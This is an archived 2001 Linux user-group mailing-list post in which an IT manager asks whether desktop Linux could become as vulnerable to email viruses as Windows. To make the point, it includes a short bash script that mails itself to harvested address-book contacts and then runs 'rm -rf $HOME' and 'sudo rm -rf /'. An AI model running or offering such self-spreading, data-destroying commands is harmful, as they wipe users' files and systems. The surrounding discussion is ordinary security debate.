[plug] security of linux desktops re mail viri

craig at postnewspapers.com.au craig at postnewspapers.com.au
Tue Dec 11 16:32:07 WST 2001 

hi all

A bit of a rave following. It was intended to be a bit more coherent. I
don't intend trolling or flamebait here, I'm asking a question and
looking for opinions on something that's bothered me for some time now.

People trumpet about linux being more secure than
windows, less prone to worms, etc. So far, it has been so beyond any reasonable argument.

Fine. However, many of the most destructive
windows exploits come down to a few factors:

	1) stupid, stupid users (ooh, anna_naked.jpg.vbs, I'll open
	that, it's a JPEG...!)
	
	2) programs that are too fond of being "smart" and "doing things
	for you" (this eMail tells me to run the attatchment w/o even
	asking the user, I'll do that because some dumb git might've
	sent me an executable christmas card...)

	3) INSECURE DEFAULTS allowing (2) to happen. (1) is, alas, not
	preventable without a shotgun. Sure, it helps the idiots use the
	PC. A bit. Maybe. Until they get a virus that nukes their pc.
	But is it worth it? 

	4) Powerful scripting and inter-app communication capabilities,
	as provided by windows scripting host, vbs, etc.

	5) Lack of user education and desire to understand what the
	f**ck they're doing

most distros have (4) in abundance. Look at bash, dcop, bonobo,
etc. Not to mention perl and python! I love these features and would find linux much less nice
to use without them, but similar reasons probably governed
the incusion of visual basic in windows.
	
Nobody is proof against (1) or (5)
unless someone comes up with an instant remote IQ test combined
with lockdown (I've never found an electrified ZIP drive
labelled "floppy" to be good enough *grin*).
	
(3) and (2) are becoming more and more popular in the quest for "easy to use" programs and environments. 

And sadly, (1) is becoming more and more common even on linux, as
companies start to deploy linux for workstations etc.

So, what is to stop a linux email virus, when it can be as simple as 
	#!/bin/bash
	mutt nobody at nowhere.com -a this_script \
	-b list_of_targets_grabbed_by_perlscript_from_common_mail_client_addressbooks \
	-s "open me stupid 13 year olds (if only they were the only
	ones), naked pictures"
	rm -rf $HOME
	# because a fair number of people have sudoers including me
	# ALL(ALL) for desktops and may have used sudo recently
	sudo rm -rf /
	
Name something like that (ok, more sophisticated but dammit I don't
write viri, never have, never will, and would like to find and kill
slowly and painfully those who do), called "anna_naked.jpg.sh"... face
it, a fair number of users are going to run it. In many mail clients,
you could just double-click on it to run it, I fear. (3) strikes again.

Currently the danger isn't large because most linux users don't fit
number (1) and (5) but the number is growing, esp. with corprate
installs, etc. The linux user base is also small enough that the chance
of more than a couple of people in a gathered addressbook also running
linux are still quite small. However, nothing stops the virus having a vbscript and a shell
script, and attatching both in the hope the user will either open the
relevant one first or, having opened one and got gibberish, open the
other. And the desktop linux user-base is growing.

Now linux mail clients, etc, tend to be more security aware than, say,
outlook express. But outlook express isn't the only windows mail client
spreading viri - it just does it better. Nothing is to stop auto-execute
vulnrabilities in MUAs for linux, and even if there are none...

You can NEVER stop a stupid user.

OK, you can kill them. But the boss won't let me do that to the users
here - and anyway we'd have about 3 staff left *grin*

So what is to prevent linux desktops from becoming just as bad as
non-outlook-using windows PCs - or even, *gasp*, as bad as windows PCs
with outlook express, due to an auto-execute vulnrability in some MUA?

So, thoughts anybody? And I'd appreciate it if nobody tries to kill me
for my questions and opinions here...
 
-----------
Craig Ringer
IT Manager
POST Newspapers
http://www.postnewspapers.com.au/
Key Fingerprint: AF1C ABFE 7E64 E9C8 FC27  C16E D3CE CDC0 0E93 380D

More information about the plug mailing list